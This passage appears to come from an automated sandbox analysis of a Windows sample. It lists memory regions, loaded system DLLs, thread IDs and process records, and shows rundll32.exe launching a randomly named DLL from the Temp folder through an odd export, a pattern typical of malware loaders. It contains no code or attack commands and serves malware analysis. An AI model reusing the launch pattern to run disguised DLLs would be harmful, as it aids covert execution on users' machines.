entry_point = 0x7ffa13356d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1041 start_va = 0x7ffa13390000 end_va = 0x7ffa133d2fff monitored = 0 entry_point = 0x7ffa133a4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1042 start_va = 0x7ffa133e0000 end_va = 0x7ffa13465fff monitored = 0 entry_point = 0x7ffa133ed8f0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 1043 start_va = 0x7ffa13520000 end_va = 0x7ffa13b63fff monitored = 0 entry_point = 0x7ffa136e64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1044 start_va = 0x7ffa13b70000 end_va = 0x7ffa13cb2fff monitored = 0 entry_point = 0x7ffa13b98210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1045 start_va = 0x7ffa13cc0000 end_va = 0x7ffa13d5cfff monitored = 0 entry_point = 0x7ffa13cc78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1046 start_va = 0x7ffa13d60000 end_va = 0x7ffa13d67fff monitored = 0 entry_point = 0x7ffa13d61ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1047 start_va = 0x7ffa13d80000 end_va = 0x7ffa13ed5fff monitored = 0 entry_point = 0x7ffa13d8a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1048 start_va = 0x7ffa13ee0000 end_va = 0x7ffa14065fff monitored = 0 entry_point = 0x7ffa13f2ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1049 start_va = 0x7ffa14070000 end_va = 0x7ffa140cafff monitored = 0 entry_point = 0x7ffa140838b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1050 start_va = 0x7ffa14220000 end_va = 0x7ffa142c6fff monitored = 0 entry_point = 0x7ffa1422b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1051 start_va = 0x7ffa14340000 end_va = 0x7ffa145bcfff monitored = 0 entry_point = 0x7ffa14414970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1052 start_va = 0x7ffa145c0000 end_va = 0x7ffa146dbfff monitored = 0 entry_point = 0x7ffa146002b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1053 start_va = 0x7ffa146e0000 end_va = 0x7ffa1474afff monitored = 0 entry_point = 0x7ffa146f90c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1054 start_va = 0x7ffa147c0000 end_va = 0x7ffa14880fff monitored = 0 entry_point = 0x7ffa147e0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1055 start_va = 0x7ffa14ba0000 end_va = 0x7ffa14bf1fff monitored = 0 entry_point = 0x7ffa14baf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1056 start_va = 0x7ffa14c00000 end_va = 0x7ffa15028fff monitored = 0 entry_point = 0x7ffa14c28740 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1057 start_va = 0x7ffa15030000 end_va = 0x7ffa1508bfff monitored = 0 entry_point = 0x7ffa1504b720 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1058 start_va = 0x7ffa15090000 end_va = 0x7ffa15136fff monitored = 0 entry_point = 0x7ffa150a58d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1059 start_va = 0x7ffa15160000 end_va = 0x7ffa1520cfff monitored = 0 entry_point = 0x7ffa151781a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1060 start_va = 0x7ffa15210000 end_va = 0x7ffa1676efff monitored = 0 entry_point = 0x7ffa153711f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1061 start_va = 0x7ffa16770000 end_va = 0x7ffa16930fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1122 start_va = 0x5600000 end_va = 0x57fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005600000" filename = "" Region: id = 1123 start_va = 0x5600000 end_va = 0x56fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005600000" filename = "" Region: id = 1175 start_va = 0x8000000 end_va = 0x80fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008000000" filename = "" Region: id = 1176 start_va = 0x8100000 end_va = 0x81fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008100000" filename = "" Region: id = 1220 start_va = 0x440000 end_va = 0x441fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1244 start_va = 0x440000 end_va = 0x440fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1245 start_va = 0x450000 end_va = 0x451fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1306 start_va = 0xd40000 end_va = 0xd60fff monitored = 0 entry_point = 0xd42300 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 1307 start_va = 0xd70000 end_va = 0xd82fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sppc.dll.mui" filename = "\\Windows\\System32\\en-US\\sppc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\sppc.dll.mui") Region: id = 1308 start_va = 0xd40000 end_va = 0xd60fff monitored = 0 entry_point = 0xd42300 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 1309 start_va = 0xd70000 end_va = 0xd82fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sppc.dll.mui" filename = "\\Windows\\System32\\en-US\\sppc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\sppc.dll.mui") Region: id = 1310 start_va = 0xd40000 end_va = 0xd60fff monitored = 0 entry_point = 0xd42300 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 1311 start_va = 0xd70000 end_va = 0xd82fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sppc.dll.mui" filename = "\\Windows\\System32\\en-US\\sppc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\sppc.dll.mui") Region: id = 1312 start_va = 0x440000 end_va = 0x441fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1313 start_va = 0x8200000 end_va = 0x82fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008200000" filename = "" Region: id = 1329 start_va = 0x440000 end_va = 0x440fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1469 start_va = 0x440000 end_va = 0x440fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1470 start_va = 0x8300000 end_va = 0x83fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008300000" filename = "" Region: id = 1480 start_va = 0x440000 end_va = 0x440fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1485 start_va = 0x440000 end_va = 0x440fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Thread: id = 20 os_tid = 0xcf0 Thread: id = 21 os_tid = 0xcf8 Thread: id = 22 os_tid = 0x1208 Thread: id = 23 os_tid = 0x10ac Thread: id = 24 os_tid = 0x10a8 Thread: id = 25 os_tid = 0xf44 Thread: id = 26 os_tid = 0xe30 Thread: id = 27 os_tid = 0xbd4 Thread: id = 28 os_tid = 0x858 Thread: id = 29 os_tid = 0x72c Thread: id = 30 os_tid = 0x338 Thread: id = 31 os_tid = 0x5b0 Thread: id = 32 os_tid = 0xae4 Thread: id = 33 os_tid = 0xbbc Thread: id = 34 os_tid = 0xbb8 Thread: id = 35 os_tid = 0xba4 Thread: id = 36 os_tid = 0xad4 Thread: id = 37 os_tid = 0xab4 Thread: id = 38 os_tid = 0x448 Thread: id = 39 os_tid = 0x89c Thread: id = 40 os_tid = 0x638 Thread: id = 41 os_tid = 0x9dc Thread: id = 42 os_tid = 0x238 Thread: id = 43 os_tid = 0x59c Thread: id = 44 os_tid = 0x48c Thread: id = 45 os_tid = 0x8dc Thread: id = 46 os_tid = 0xb80 Thread: id = 47 os_tid = 0x9c4 Thread: id = 48 os_tid = 0x7f8 Thread: id = 49 os_tid = 0x594 Thread: id = 50 os_tid = 0x828 Thread: id = 51 os_tid = 0x46c Thread: id = 52 os_tid = 0xf8 Thread: id = 53 os_tid = 0x8c Thread: id = 54 os_tid = 0x234 Thread: id = 55 os_tid = 0x1e0 Thread: id = 56 os_tid = 0x824 Thread: id = 57 os_tid = 0xa78 Thread: id = 58 os_tid = 0x878 Thread: id = 59 os_tid = 0xa30 Thread: id = 60 os_tid = 0x838 Thread: id = 61 os_tid = 0xa1c Thread: id = 62 os_tid = 0xa14 Thread: id = 63 os_tid = 0xadc Thread: id = 64 os_tid = 0xa80 Thread: id = 65 os_tid = 0x5ec Thread: id = 66 os_tid = 0x780 Thread: id = 67 os_tid = 0x5ac Thread: id = 68 os_tid = 0x508 Thread: id = 69 os_tid = 0x4f8 Thread: id = 70 os_tid = 0x7e4 Thread: id = 71 os_tid = 0x7e0 Thread: id = 72 os_tid = 0x7dc Thread: id = 73 os_tid = 0x7d8 Thread: id = 74 os_tid = 0x7cc Thread: id = 75 os_tid = 0x7c4 Thread: id = 76 os_tid = 0x788 Thread: id = 77 os_tid = 0x744 Thread: id = 78 os_tid = 0x448 Thread: id = 79 os_tid = 0x6f8 Thread: id = 80 os_tid = 0x6d4 Thread: id = 81 os_tid = 0x640 Thread: id = 82 os_tid = 0x62c Thread: id = 83 os_tid = 0x530 Thread: id = 84 os_tid = 0x4a8 Thread: id = 85 os_tid = 0x2ac Thread: id = 86 os_tid = 0x270 Thread: id = 87 os_tid = 0x154 Thread: id = 88 os_tid = 0x1b8 Thread: id = 89 os_tid = 0x1bc Thread: id = 90 os_tid = 0x180 Thread: id = 91 os_tid = 0x188 Thread: id = 92 os_tid = 0x148 Thread: id = 93 os_tid = 0x12c Thread: id = 94 os_tid = 0xfc Thread: id = 95 os_tid = 0x60 Thread: id = 96 os_tid = 0x3f0 Thread: id = 97 os_tid = 0x3e8 Thread: id = 98 os_tid = 0x3cc Thread: id = 99 os_tid = 0x364 Thread: id = 105 os_tid = 0x1088 Thread: id = 106 os_tid = 0x10d4 Thread: id = 113 os_tid = 0xb14 Thread: id = 139 os_tid = 0x1280 Process: id = "3" image_name = "rundll32.exe" filename = "c:\\windows\\system32\\rundll32.exe" page_root = "0x38271000" os_pid = "0xc74" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x360" cmd_line = "C:\\Windows\\system32\\rundll32.exe \"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dnrdfsi11023.dll\",Rdwmnjioffws" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fa87" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1124 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1125 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1126 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1127 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1128 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1129 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1130 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1131 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1132 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 1133 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 1134 start_va = 0x7ff71f8f0000 end_va = 0x7ff71f903fff monitored = 0 entry_point = 0x7ff71f8f4270 region_type = mapped_file name = "rundll32.exe" filename = "\\Windows\\System32\\rundll32.exe" (normalized: "c:\\windows\\system32\\rundll32.exe") Region: id = 1135 start_va = 0x7ffa16770000 end_va = 0x7ffa16930fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1138 start_va = 0x400000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1139 start_va = 0x7ffa15160000 end_va = 0x7ffa1520cfff monitored = 0 entry_point = 0x7ffa151781a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1140 start_va = 0x7ffa13130000 end_va = 0x7ffa13317fff monitored = 0 entry_point = 0x7ffa1315ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1141 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1142 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 1143 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1146 start_va = 0x7ffa13cc0000 end_va = 0x7ffa13d5cfff monitored = 0 entry_point = 0x7ffa13cc78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1147 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1148 start_va = 0x580000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1149 start_va = 0x7ffa14340000 end_va = 0x7ffa145bcfff monitored = 0 entry_point = 0x7ffa14414970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1150 start_va = 0x7ffa145c0000 end_va = 0x7ffa146dbfff monitored = 0 entry_point = 0x7ffa146002b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1151 start_va = 0x7ffa13320000 end_va = 0x7ffa13389fff monitored = 0 entry_point = 0x7ffa13356d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1152 start_va = 0x7ffa12e80000 end_va = 0x7ffa12f34fff monitored = 0 entry_point = 0x7ffa12ec22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1153 start_va = 0x7ffa15140000 end_va = 0x7ffa1515bfff monitored = 0 entry_point = 0x7ffa151431a0 region_type = mapped_file name = "imagehlp.dll" filename = "\\Windows\\System32\\imagehlp.dll" (normalized: "c:\\windows\\system32\\imagehlp.dll") Region: id = 1154 start_va = 0x480000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 1155 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1156 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1157 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 1173 start_va = 0x7ffa11580000 end_va = 0x7ffa115f8fff monitored = 0 entry_point = 0x7ffa1159fb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 1174 start_va = 0x7df5ffb10000 end_va = 0x7df5ffeb0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Thread: id = 102 os_tid = 0xc70 Thread: id = 103 os_tid = 0xb4c Process: id = "4" image_name = "rundll32.exe" filename = "c:\\windows\\syswow64\\rundll32.exe" page_root = "0x59f6d000" os_pid = "0xabc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0xc74" cmd_line = "C:\\Windows\\system32\\rundll32.exe \"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dnrdfsi11023.dll\",Rdwmnjioffws" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fa87" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1158 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1159 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1160 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1161 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1162 start_va = 0xa0000 end_va = 0xdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1163 start_va = 0x230000 end_va = 0x241fff monitored = 0 entry_point = 0x234600 region_type = mapped_file name = "rundll32.exe" filename = "\\Windows\\SysWOW64\\rundll32.exe" (normalized: "c:\\windows\\syswow64\\rundll32.exe") Region: id = 1164 start_va = 0x250000 end_va = 0x424ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1165 start_va = 0x4400000 end_va = 0x45fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 1166 start_va = 0x771d0000 end_va = 0x7734afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1167 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1168 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1169 start_va = 0x7fff0000 end_va = 0x7dfa1676ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1170 start_va = 0x7dfa16770000 end_va = 0x7ffa1676ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfa16770000" filename = "" Region: id = 1171 start_va = 0x7ffa16770000 end_va = 0x7ffa16930fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1172 start_va = 0x7ffa16931000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffa16931000" filename = "" Region: id = 1177 start_va = 0xe0000 end_va = 0xe3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1178 start_va = 0xf0000 end_va = 0xf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 1179 start_va = 0x100000 end_va = 0x101fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1180 start_va = 0x110000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 1181 start_va = 0x640d0000 end_va = 0x6411ffff monitored = 0 entry_point = 0x640e8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1182 start_va = 0x64050000 end_va = 0x640c9fff monitored = 0 entry_point = 0x64063290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1183 start_va = 0x76720000 end_va = 0x767fffff monitored = 0 entry_point = 0x76733980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1184 start_va = 0x64120000 end_va = 0x64127fff monitored = 0 entry_point = 0x641217c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1185 start_va = 0x4600000 end_va = 0x487ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004600000" filename = "" Region: id = 1186 start_va = 0x76720000 end_va = 0x767fffff monitored = 0 entry_point = 0x76733980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1187 start_va = 0x76910000 end_va = 0x76a8dfff monitored = 0 entry_point = 0x769c1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1188 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1189 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1190 start_va = 0x150000 end_va = 0x20dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1191 start_va = 0x73e50000 end_va = 0x73ee1fff monitored = 0 entry_point = 0x73e90380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 1192 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 1193 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1194 start_va = 0x68b00000 end_va = 0x68d77fff monitored = 0 entry_point = 0x68b15e90 region_type = mapped_file name = "aclayers.dll" filename = "\\Windows\\AppPatch\\AcLayers.dll" (normalized: "c:\\windows\\apppatch\\aclayers.dll") Region: id = 1195 start_va = 0x76a90000 end_va = 0x76b4dfff monitored = 0 entry_point = 0x76ac5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1196 start_va = 0x743d0000 end_va = 0x74516fff monitored = 0 entry_point = 0x743e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1197 start_va = 0x74ab0000 end_va = 0x74bfefff monitored = 0 entry_point = 0x74b66820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1198 start_va = 0x74eb0000 end_va = 0x762aefff monitored = 0 entry_point = 0x7506b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1199 start_va = 0x76800000 end_va = 0x76836fff monitored = 0 entry_point = 0x76803b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 1200 start_va = 0x745b0000 end_va = 0x74aa8fff monitored = 0 entry_point = 0x747b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 1201 start_va = 0x762b0000 end_va = 0x7646cfff monitored = 0 entry_point = 0x76392a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1202 start_va = 0x76c00000 end_va = 0x76cacfff monitored = 0 entry_point = 0x76c14f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1203 start_va = 0x73f00000 end_va = 0x73f1dfff 